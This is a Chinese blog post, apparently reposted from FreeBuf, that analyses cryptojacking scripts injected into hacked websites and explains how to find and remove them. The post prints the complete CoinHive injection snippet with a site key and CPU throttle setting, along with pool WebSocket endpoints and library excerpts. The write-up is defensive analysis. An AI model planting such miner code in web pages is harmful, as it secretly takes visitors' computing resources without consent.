• 欢迎访问夏天爸爸记录站,WordPress信息,WordPress教程,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入SUmmerdad BLOG

如何避免网页被挖矿

安全技术 summerdad 1年前 (2018-08-18) 50次浏览 已收录 0个评论 扫描二维码

0×0 背景

挖矿目前已经成为黑帽子牟利的主要手段,最近上网偶然间发现部分网站被挂马后存在网页挖矿的行为,区别于常规病毒操作系统中挖矿行为,网页主要在网站上挂上恶意的 JS 脚本,访问该网站即触发挖矿动作。

目前很多网页挖矿主要以 CoinHive 的方式较多,一般挖矿用户以主动方式直接使用 C 或者其他语言构造的 miner 客户端进行 CPU 或 GPU 计算 Hash。前端挖矿用户以被动或主动方式在不知情或知情情况下利用浏览者的 CPU 或 GPU。

0×1 现象

访问恶意网站时 CPU 飙升,关闭网站后回复正常水平。

图片 1.png

关闭之后:

图片 2.png

0×2 源代码分析 

查看网页源代码可发现部分挖矿的代码,经过简单确定非手机浏览器后,即开始挖矿的动作。

图片 3.png

浏览器进程占用了较大的 CPU 资源:

图片 4.png

查看浏览器进程中,可以在内存地址中发现有挖矿地址的痕迹:

图片 5.png

主要引用的挖矿代码的详细都在引用的 JS 脚本当中,仅使用 70%的 CPU 资源。

<script src="https://coinhive.com/lib/coinhive.min.js"></script>

<script>

 var miner = new CoinHive.Anonymous('Jgv7noixIKHmJ7IIhAR9jySAwG3ZU8vt', {throttle: 0.7});

 if (!miner.isMobile() && !miner.didOptOut(14400)) {

 miner.start();

}

</script>

Jgv7noixIKHmJ7IIhAR9jySAwG3ZU8vt:CoinHive 当中的钱包地址;

throttle:浏览器占用 CPU 的阈值,调节到合适的阈值时用户会很难注意到浏览器的算力被滥用。

coinhive.min.js 源码如下:

图片 6.png

挖矿脚本使用 WebSocket 与矿池进行通信,部分的矿池结点如下:

wss://ws001.coinhive.com/proxy  

wss://ws002.coinhive.com/proxy  

wss://ws003.coinhive.com/proxy  

wss://ws004.coinhive.com/proxy  

wss://ws005.coinhive.com/proxy  

wss://ws006.coinhive.com/proxy  

wss://ws007.coinhive.com/proxy  

wss://ws008.coinhive.com/proxy  

wss://ws009.coinhive.com/proxy  

wss://ws010.coinhive.com/proxy  

wss://ws011.coinhive.com/proxy  

wss://ws012.coinhive.com/proxy

 

图片 7.png

挖矿脚本允许自动调节线程数目:

this._throttle=Math.max(0,Math.min(.99,this.params.throttle||0));

this._stopOnInvalidOptIn=false;

this._waitingForAuth=false;

this._selfTestSuccess=false;

this._verifyThread=null;

this._autoThreads={

enabled:!!this.params.autoThreads,

interval:null,

adjustAt:null,

adjustEvery:1e4,

stats:{}

};

this._tab={

ident:Math.random()*16777215|0,

mode:CoinHive.IF_EXCLUSIVE_TAB,g

race:0,

waitReconnect:0,

lastPingReceived:0,

interval:null

};

 

图片 8.png

0×3 解决方法:

1.根据页面后查看网页源代码,搜索有关于 CoinHive,Miner 等关键字可以快速定位到界面,使用记事本或者网页编辑器删除挖矿的关键代码。

2.访问小电影网站时候多留心自己的 CPU 性能。

[v_qing]*本文作者 si1ence,转载请注明来自 FreeBuf.COM[/v_qing]


乐趣公园 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:如何避免网页被挖矿
喜欢 (0)
[xiahuanming@gmail.com]
分享 (0)

您必须 登录 才能发表评论!